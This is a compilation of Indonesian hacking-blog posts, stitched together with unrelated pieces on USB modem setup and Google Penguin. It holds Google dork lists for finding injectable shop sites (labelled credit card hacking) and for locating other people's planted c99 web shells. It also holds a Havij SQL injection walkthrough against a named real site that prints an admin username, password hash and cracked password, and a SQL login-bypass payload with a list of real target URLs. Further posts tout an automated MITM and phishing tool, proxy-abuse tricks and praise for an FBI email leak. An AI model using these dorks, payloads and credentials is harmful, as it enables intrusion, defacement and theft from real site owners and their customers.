CREDIT CARD HACKING DORK

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"

inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"

inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"

Setting USB Modem Di Backtrack Menggunakan Sakis3g

Internetan itu memang mengasyikkan bagi kalangan yang suka mencari ilmu bahkan bagi yang sudah menjadi 'dedemit' maya. Tapi disebagian orang ada yang berinternetan di warnet bahkan langganan ama sp***y, ada juga yang menggunakan handphone atau USB Modem. Ya USB Modem, mungkin dari sebagian kalangan yang sering berselancar internet menggunakan USB Modem mengeluhkan settingan di linux backtrack mereka atau di linux yang berbase ubuntu. Disini saya akan memberi cara agar bisa internetan menggunakan USB Modem dan pastinya menggunakan backtrack. Baiklah tanpa basa basi yang nantinya bisa basi, saya akan memberi cara agar USB Modemnya anda bisa terkoneksi dengan backtrack yaitu dengan sakis3g.

Sebelumnya saya akan memberi penjelasan tentang kelebihan dan kekurangan sakis3g ini

Kelebihan dari sakis3g:

• Support hampir semu 3g USB Modem broadband dari ZTE, CSL, Celcom, Huawei, Digi, Maxis, Nokia bahkan Motorola
• Built-in Usb-modewith
• Portable, tidak perlu koneksi internet untuk mensettingnya
• Tanpa install dependencies
• Cocok untuk segala distro linux yang berplatform rpm, deb, pisi, lza atau yang lainnya

Kekurangan dari sakis3g:

• Belum support untuk modem HSO, dan
• Belum support untuk modem CDMA atau EVDO.

Dan cara mensetting sakis3g adalah sebagai berikut:

1. Download sakis3g di situs resminya disini (gunakan aja wget biar cepet)
2. Ekstrak file sakis3g.gz yang telah di download tersebut
3. Copy file dengan perintah >> cp sakis3g /usr/local/bin/
4. Lakukan file permission sakis3g yang telah di copy tersebut diatas dengan perintah >> chmod +x /usr/local/bin/sakis3g
5. Menjalankan sakis3g tersebut dengan perintah >> sakis3g --interactive

Tampilan sakis3g yang telah di setting 

./Tools backtrack

 dibawah ada tool untuk backtrack yag dibuat oleh Zee Eichel dari IBT, berikut tools nya:

1. nomiyachan
2. evilangel

1. nomiyachan

deskripsi : tools ini di bangun dari bahasa pemograman bash linux yang sangat baik untuk memonitoring sistem dan port ( sysadmin tools help )
tested : backtrack V R1
download : http://code.google.com/p/nomiyachan
last version : v.02 [ beta ]
svn checkout http://nomiyachan.googlecode.com/svn/trunk/ nomiyachan-read-only
forum discuss : http://forum.indonesianbacktrack.or.id/showthread.php?tid=1145

fitur :
 1. Port Analysis
 2. Routing & kernel analysis
 3. System Analysis
 4. Network analysis
 5. Tools requirement & update
-- Port Analysis
 ===============================
 ---- All Port Analysis
 ---- TCP Port Analysis
 ---- UDP Port Analysis
 ---- Listening Socket Analysis
 ---- List All Statistic Port
 ---- List All PID & Process
 ---- Process Analysis
 ---- Your Port Analysis
-- Routing & Kernel Analysis
 ===============================
 ---- Kernel Routing
-- System Analysis
 ===============================
 ---- Running Process Analysis
 ---- Memory Process Analysis
 ---- Average CPU Load & Disk Activity
 ---- Users Process Analysis
-- Network analysis
 ===============================
 ---- TCP Dump
 ---- Iptraf
-- Tools requirement & update
 ===============================
 ---- TCP Dump
 ---- Netstat
 ---- Ip traf
 ---- Systat

2. evilangel

deskripsi : tools ini di bangun dari bahasa pemograman bash linux dan merupakan automatic MITM attack. memudahkan user untuk melakukan serangan dengan metode MITM
tested : backtrack V R1
download : http://code.google.com/p/evilangel/
versi : 1.0 [beta] — sh-c
svn checkout http://evilangel.googlecode.com/svn/trunk/ evilangel-read-only
forum discuss : http://forum.indonesianbacktrack.or.id/showthread.php?tid=1145
fitur :

*? cutting
 *? sniffing
 *? spoofing
 *? phissing
 *? metasploit backdoor
 *? Update tools

Laporkan Situs Spam Melaui Google Penguin 2.0 Spam Report Form!

Baru beberapa hari sejak dirilisnya Google Penguin 2.0, tetapi sudah ada beberapa laporan perubahan yang terjadi. Ada juga banyak laporan bahwa walaupun sudah menggunakan Penguin, Google masih saja memberikan peringkat kepada situs-situs spam. Jadi menurut beberapa orang hal ini tidak berdampak apapun terhadap situs-situs itu. Tapi Anda sekarang dapar melaporkan ini langsung ke Google. Matt Cutts sebagai Distinguished Engineer Google melakukan tweet dan mengabarkan tentang Penguin Spam Report terbaru tanggal 23 Mei 2013 lalu.

Bagaimana Cara Melaporkan Situs Spam ke Google?

Jika Anda ingin melaporkan situs yang Anda anggap sebagai spam maka Anda dapat melaporkannya di Google Spam Report. Setelah Anda masuk ke sana, Google akan meminta Anda untuk mengisi informasi tentang situs spam yang masih berperingkat:

• The URL of the spam site.
• The URL of the result that demonstrates the problem.
• Any additional information about the spam result.

Tidak seperti formulir Feedback Penguin tahun lalu, Google tidak memberikan Anda pilihan untuk melaporkan situs yang seharusnya tidak terpengaruh oleh pembaruan ini. Walaupun Penguin sudah di update hingga versi 2.0 saat ini, tapi tidak menutup kemungkinan bahwa algoritma ini akan ekurat 100%.

Ada juga laporan dari seorang webmaster yang menghadapi masalah setelah diluncurkannya update Penguin 2.0 ini. Masalahnya adalah dia kehilangan posisi di Search Result Google. Menurutnya, sebelum implikasi Penguin 2.0 situsnya berada di posisi teratas untuk kata kunci tersebut padahal semua kontennya unik dan orisinil bahkan dia tidak melakukan spamming. Jadi mengapa? Mungkin Google perlu untuk menanggapi hal ini.

Pembaruan ini tidak sekeras update penguin yang pertama, yang berdampak pada ribuan situs. Dan yang saat ini bahwa situs spam masih lolos dari pengawasan dan masih memiliki posisi dan peringkat yang nyaman.

Kita dapat melihat laporan yang dipaparkan oleh SerchMetrics 25 biggest Penguin 2.0 Looser mengenai situs apa saja yang memperoleh dampak dari Update Penguin ini.  Ada beberapa korban dengan update ini, misalnya situs Salvation Army telah kehilangan 31,89% dari visibilitas pencarian. Namun, korban utama kebanyakan situs porno dan situs game. Anda dapat melihat laporannya di bawah ini:

Meskipun Anda selalu dapat melaporkan spam dari Google Webmaster tools, formulir ini adalah  yang pertama kalinya oleh Google dan memungkinkan Anda untuk melaporkan spam tanpa login ke Google Webmaster Tools. Saya membayangkan bahwa ini akan disalahgunakan dan mungkin ada ratusan SEO melaporkan semua pesaing mereka. Tapi jujurlah dan bersainglah secara sehat.

cara menemukan celah dalam websiste

kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakan sql poizon.  Untuk lebih jelasnya simak tutorial dibawah ini
Step 1: Download SQL Poizon Software
Step 2: Buka Sql Poizon v1.1 – The Exploit Scanner.exe

Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.

Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”

Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.

Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln

Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan tool havij untuk SQLi. Oke deh sekian dulu tutorial kali ini,

Macam-macam dork HAVIJ

 inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:Productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id= newsid= news_display.php?getid= ages.php?id= clanek.php4?id= review.php?id= iniziativa.php?in= curriculum.php?id= labels.php?id= look.php?ID= galeri_info.php?l= tekst.php?idt= newscat.php?id= newsticker_info.php?idn= rubrika.php?idr= offer.php?idf= "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: getimagesize() "id=" & intext:"Warning: session_start() "id=" & intext:"Warning: mysql_num_rows() "id=" & intext:"Warning: mysql_query() "id=" & intext:"Warning: array_merge() "id=" & intext:"Warning: preg_match() "id=" & intext:"Warning: ilesize() "id=" & intext:"Warning: filesize() index.php?id= buy.php?category= article.php?ID= play_old.php?id= newsitem.php?num= top10.php?cat= historialeer.php?num= reagir.php?num= intext:"error in your SQL syntax" +site:mm intext:"mysql_num_rows()" +site:mm intext:"mysql_fetch_array()" +site:mm intext:"Error Occurred While Processing Request" +site:mm intext:"Server Error in '/' Application" +site:mm intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:mm intext:"Invalid Querystring" +site:mm intext:"OLE DB Provider for ODBC" +site:mm intext:"VBScript Runtime" +site:mm intext:"ADODB.Field" +site:mm intext:"BOF or EOF" +site:mm intext:"ADODB.Command" +site:mm intext:"JET Database" +site:mm intext:"mysql_fetch_row()" +site:mm intext:"Syntax error" +site:mm intext:"include()" +site:mm intext:"mysql_fetch_assoc()" +site:mm intext:"mysql_fetch_object()" +site:mm intext:"mysql_numrows()" +site:mm intext:"GetArray()" +site:mm intext:"FetchRow()" +site:mm intext:"Input string was not in a correct format" +site:mm

CARA CURI SHELL ORANG YG SUDAH TERTANAM

yaudah langsung aja...

inurl:c99.php
inurl:"/c99.php"
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
inurl:/c99.php+uname
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
"c99.php" filetype:php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
c99shell
intitle:C99Shell v. 1.0 pre-release +uname
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php uid=0(root)
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
nurl:c99.txt
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
inurl:c99.php
allinurl: c99.php
allinurl: c99.txt
inurl:"/c99.php"
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
inurl:"/c99.php"
c99 shell v.1.0 (roots)
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:"c99.php"
inurl:"c99.php"
inurl:"c99.php" c99shell
inurl:"c99.php"
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php



Caranya : copy salah satu dork di atas ke google.
Nanti pilih salah satu website dari sekian banyak website yang ada

Deface dengan Havij

kali ini saya akan share tentang hacking lagi , lebih mudah.
kalian tau Havij gak , kalau gak tau , Havij itu tools untuk memudahkan kita melakukan sqi injection .
MAU COBA, Download Disini .

okeh langsung aja ya ,
Pertama tama instal Havij lalu buka filenya yang sudah terinstal

Klik Untuk Perbesar

Soal target jangan khawatir karena blog ini menyediakna banyak target,

Contoh : Disini , disini ,dan disini

saya ambil satu contoh situs yang vuln.

http://www.bierhalle.pl/_php/index_base.php?Screen_Option=1&Page_ID=2

klik Analyze , tunggu sampai selesai.

itu tandanya berhasil kalo gak berhasil ada tulisan Target Not Vulnerable tapi jika seperti gambar diatas itu tandanya berhasil, lalu klik table

Terus klik Get Tabel , Tunggu sampai selesai

terus cari kata yang berhubungan dengan Admin, entah itu admin,users,login, atau management

nah itu ketemunya kata users

lalu klik gets column

nah lo bahasanya aneh , translate aja pake google translate
saya ambil column yang login dan passwordnya haslo dalam bahasa polandia yaitu password

nah lo tuh username sama passwordnya kelihatan banyak lagi,
saya ambil yang paling atas
username : wpojda
password : 7253495C40B0DE886424A520EF1EB5DA58A77C38

nah kok passwordnya gitu ya aneh , tenang aja masih ada langkahnya
kita menuju http://www.md5decrypter.co.uk/ untuk ngecrack passwordnya,

itu kan password aslinya keluar hpiracing , tapi kalo ada pesan yang tidak meng enakan and backgroundnya merah di md5decryptor itu artinya passwordnya gak bisa di crack atau dengan istilah Salt
okeh mari kita ke Havij lagi .
kita ke Find Admin , lalu masukan linknya tapi kurangin linknya , terus klik start

Panah merah = menuju ke situ
Panah Biru = masukan link indexnya saja
Panah Hijau = jika sudah , klik start , tunggu sampai selesai
Panah Kuning = itu hasilnya jika sudah selesai
Lingkaran Hitam = 200 ok itu artinya ditemukan


Nih Hasilnya :
Login : http://www.bierhalle.pl/_admin/
username : wpojda
password : hpiracing

Deface dengan AdminLogin.asp

GIMANA KAK?? LAGI BELAJAR DEFACE YA?? 

ini ane kasih tutorialnya :D

 

Langsung Aja 

Buka Google.com

Masukin Dorknnya : inurl:"/AdminLogin.asp"

Klik Salah Satu 

Login Dengan Ini : 

Username : 1'or'1'='1

Password : 1'or'1'='1

Klik Login Tarra Udah Masuk Seterah Mau Diapain :v

Live Demo : 
-http://www.quickwrench.com/Admin/adminlogin.asp
-http://www.ringjordan.com/AdminLogin.asp
-http://www.sunmarytrust.org/adminlogin.asp
-http://www.adyar.net/Adminlogin.asp
-http://polyprodw.trafficpullz.info/adminlogin.asp
-http://www.preventivecardiology.in/adminlogin.asp

"HIJACKING"

Pengertian Hijacking


          Session hijacking merupakan aksi pengambilan kendali session milik user lain setelah sebelumnya “pembajak” berhasil memperoleh autentifikasi ID session yang biasanya tersimpan dalamcookies. Session hijacking menggunakan metode captured, brute forced atau reserve enggineered guna memperoleh ID session, yang untuk selanjutnya pembajak memegang kendali atas session yang dimiliki oleh user lain tersebut selama session berlangsung
           Istilah sesi pembajakan (session hijacking) umumnya digunakan untuk menggambarkan proses sebuah koneksi TCP yang diambil alih oleh sebuah rangkaian serangan yang sudah dapat diprediksi sebelumnya. Pada serangan seperti itu, penyerang memperoleh kendali melalui koneksi TCP yang sudah ada. Bila diterapkan pada keamanan aplikasi web, session hijacking mengacu pada pengambilalihan sebuah session aplikasi web.

Contoh Kasus Hijacking 

       Dibuatkan sebuah ilustrasi berikut ini untuk mengetahui bagaimana session hijacking dapat dilakukan, sehingga sejauh mana kelemahan dari situs web yang kita gunakan untuk melakukan komunikasi atau bertukar data. Pada waktu itu Abdi berkenalan dengan Akbar melalui media internet
yaitu aplikasi chatting online. Keduanya saling bertukar informasi mengenai proses bisnis yang mereka jalankan selama ini. Melalui email, Akbar ingin mengajak Abdi untuk melakukan pertemuan secara langsung untuk membahas semua rencana bisnis yang akan mereka jalankan, akhirnya tiba waktunya mereka bertemu, tapi pada kenyataannya Akbar tidak muncul, nah Abdi berpendapat apakah chatting online dan e-mail yang dia kirim tidak pernah sampai atau telah dilakukan session hijacking oleh orang yang tidak bertanggung jawab? Ternyata e-mail Abdi telah dilakukan pembajakan oleh orang yang tidak bertanggung jawab dengan cara membukanya melalui layanan eWebMail yang menggunakan java servlet. Langkah yang dilakukan adalah menuju ke halaman cookie pal.

         Cookie Pal adalah aplikasi shareware yang tersedia pada http://www.kbura.net/. Digunakan untuk memonitor dan mengontrol cookie yang dikirim oleh situs web pada suatu browser. Pada kotak pop-up itu terlihat bahwa eWebMail mengirimkan cookie string yang panjang, dengan nama “uid” . Nilai “uid” sepertinya di-encode dalam heksadesimal. Cookie ini menarik untuk disimak, mengingat bahwa seringkali aplikasi web menggunakan cookie untuk melewatkan session identifier selama berinteraksi dengan web.
Mungkin cookie ini juga semacam session identifier dari eWebMail.
Langkah selanjutnya adalah membersihkan browser dari semua cookie dan login ke eWebMail sebagai fauziah_z2@ewebmailexample.com. Cookie “uid” di-set, dan segera kita dapat melihat halaman inbox yang ternyata memiliki satu buah pesan email. Email ini berasal dari service eWebMail.

Cara Pencegahan Hijacking pada Email dan chatting

Cara Pencegahan Hijacking dapat dilakukan dengan Berbagai metode diantaranya :

1. Dengan Cookie

           Cookie ditangani melalui browser. Browser mengirimkan cookie yang diperlukan ke web server bersama dengan request HTTP jika sebelumnya ada cookie yang diterima dari server yang sama. Browser terkenal, seperti Netscape, Internet Explorer, dan Opera menangani cookie secara baik. Cookie lebih menguntungkan daripada field tersebunyi. Field tersebunyi selalu memerlukan halaman form HTML untuk dikirim kembali ke server, sedangkan cookie tidak memerlukan form HTML apapun.Segi kerugiannya adalah kebanyakan situs menggunakan cookie untuk melacak tingkah laku user. Situs yang menampilkan banner iklan diketahui melanggar privacy user dengan cara mengumpulkan informasi tentang user secara berlebihan melalui pelacakan aktivitas user via cookie dan acuan-acuan HTTP. Sayangnya, browser tidak memiliki mekanisme built-in yang memadai untuk secara selektif hanya memilih cookie-cookie tertentu saja. Untuk maksud ini program seperti Cookie Pal dapat digunakan sebagai alat bantu.

2. Dengan Field Tersembunyi

             Field tersembunyi di dalam form HTML dapat juga digunakan untuk mengirimkan dan mengembalikan informasi antara browser dan web server. Keuntungan field tersebunyi dibandingkan cookie adalah field tersebut tetap dapat bekerja walaupun browser telah diatur untuk menolak semua cookie.

SQLi Dork Scanner

Tuh, judul diatas paling sering tak cari di google, wkwk, seringnya dapet scanner dork yg numpang di hostingan orang sih, jadi sering tiba² ilang. Nah, ini sekarang aku nemu dork scanner lagi dengan kumpulan tools lainnya di : http://vuln.cvvtools.pro/googlesqlier.php

Daripada ribet buka google, cek satu² mana yg vuln kan capek, hehe, kalo ada yg simple ngapain cari yg ribet, hehe

Cara Tercepat Mencari Proxy Server Gratis

Karena uda jarang post cara internetan gratis, ini saya share caranya aja deh.


Sebelum memulai pembahasan "cara tercepat mencari proxy server", Catet atau bookmark dulu sob web-web yang dibutuhkan:
1. www.tejji.com 
2. http://www.t1shopper.com/tools/port-scan/

Langkah pertama dalam mencari proxy server adalah nonton tv sob. ini serius sob, karena lewat tv kita bisa melihat promo-promo dari operator yang websitenya bisa kita jadikan bugs.

Langkah kedua, website atau query yang kita curigai mengandung proxy server kita catet. Misal: mini5.opera-mini.net [ ada promo unlimited operamini kan sob ]

Langkah ketiga, ubah url atau domain yang kita catet tadi ke ip numeric dengan tejji.com. Sebagai contoh:
mini5.opera-mini.net =>141.0.11.253

Langkah keempat, catet ip numeric tersebut. Kemudian masuk ke http://www.t1shopper.com/tools/port-scan/ Lalu centang semua port ini di
8000, 8080, 80, 3128, 3124,9201, 9002 Scan this list of port numbers: [semua itu adalah port yang digunakan untuk internetan gratis] =>>kalaupun ada port yang lain,fungsinya berbeda.

Lalu klik Scan Ports

bla sudah muncul hasilnya pilih yg berwarna merah

Nah ip:141.0.11.253 dan port:80 inilah yang kita jadikan seting hape atau file prov. Kalau apn, bisa kalian isi sesuai operator kalian.Bisa Telkomsel, indosatm2 dll.

Uji coba dulu di browser hape sob. Coba buka 0.facebook.com atau apa aja. Kalau bisa connect, berarti bisa digunakan jalur akses internet. Kalau beruntung,bisa full gratis di browser hape.

Kejutan dari Anonymous Untuk FBI !

Anonymous punya kejutan untuk markas besar FBI di negeri adidaya sana. Apa itu ? Sistem keamanan yang diklaim hampir mendekati tidak mungkin untuk dibobol, akhirnya tembus juga. Sekitar 294 E-Mail anggota FBI berhasil diretas Anonymous. E-Mail dengan domain @fbi.gov itu kini sudah tersebar luas di kalangan para hacker untuk mempelajari sistem keamanan FBI dari 'dalam'.

Ini dia listnya : http://pastebin.com/9jNiymF3

Siapa kami? Siapa kalian? Dan siapa kita semua? Yang jelas kita adalah satu perjuangan, satu ambisi, dan satu kekuatan. We Are #Anonymous

Diatas adalah pesan dari Anonymous Indonesia. Sebagai blog yang bertema hacking, saya hanya meyebarluaskan. Bukan berarti saya yang meretas sistem FBI. Credit tetap diberikan kepada Anonymous yang telah berhasil meretas ke sistem FBI. You do it great, master!

Cara menggunakan Angry IP untuk Scan Proxy gratis

Angry IP adalah salah satu program yang cukup terkenal karena kecepatanya dalam melakukan pencarian atau scan proxy sakti dan juga port yang bisa digunakan untuk gretongan.

Persiapan sebelumnya memulai scan biasanya kalau proxy sakti yang sebelumnya mati sehingga trik internet gratis juga ikut coid, pasti proxy sakti yang baru ada lagi, dan pergeseran biasanya tidak terlalu jauh. Sehingga teman-teman perlu mengingat APN dan IPC (IP Konek) provider yang mengandung proxy sakti.

Metode pencarian proxy sakti terdapat 3 metode:

1. Metode IP Range yaitu kita yang menentukan proxy sakti yang akan discan, contoh IP Range
   192.168.5.0 sampai 192.168.7.255
   artinya kita akan menscan dari
   192.168.5.0,
   192.168.5.1 sd/ 192.168.5.251 lanjut ke
   192.168.6.0 s/d 192.168.6.255
   lanjut ke
   192.168.7.0 s/d 192.168.7.254.
   
2. Metode IP Random yaitu kita menetukan IP minimum contoh 192.168.0.0 , artinya proxy yang akan discan , akan berawalan 192 semua, untuk bite kedua dan seterusnya tergantung Angry IP Scanner yang menetukan (dirandom).
   
3. IP List File yaitu kita akan menscan Proxy Sakti yang sudah tersimpan dalam komputer dengan format txt, dimana didalamnya terdapat beberapa daftar proxy sakti, ingat hanya proxy, jangan ikutkan port.
   

Sekarang kita menuju ke jendelan pengaturan dari Angry IP Scanner, dengan mengklik Tools -Preferences , maka akan muncul jendela pengaturan seperti dibawah ini.

• Tab Scanning ada tiga bagiannya yaitu:
  1. Thread terdiri
     delay yaitu pengaturan waktu jedah untuk setiap range ip yang di scan.
     maximum number yaitu berapa proxy yang akan discan dalam 1 thread.
     
  2. Pinging defaul aja bro
     
  3. Brodcast didefaultkan juga.
     
• Tab Port ini merupakan hal penting yang perlu diatur, agar proses scanning yang dilakukan akan memuncul port secara langsung dan cepat, yaitu dengan mengisikan port pada port selection.
  
